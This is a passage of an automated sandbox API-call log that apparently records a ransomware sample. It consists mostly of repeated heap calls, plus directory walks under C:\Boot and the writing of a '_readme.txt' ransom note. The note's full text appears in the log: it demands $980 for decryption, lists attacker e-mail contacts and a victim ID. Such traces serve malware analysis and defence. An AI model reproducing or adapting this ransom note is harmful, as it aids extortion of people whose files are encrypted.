(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.516] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0188.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.517] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.517] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.517] PathFindFileNameW (pszPath="") returned="" [0188.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.517] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.518] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.518] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.519] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0188.520] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0188.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.521] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0188.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.522] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.522] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.522] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.523] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*" (normalized: "c:\\boot\\pt-br\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.524] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.524] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.525] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0188.525] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.527] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.527] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.527] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.527] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.528] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0188.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.528] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.528] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.528] PathFindFileNameW (pszPath="") returned="" [0188.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.528] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.528] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.528] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: 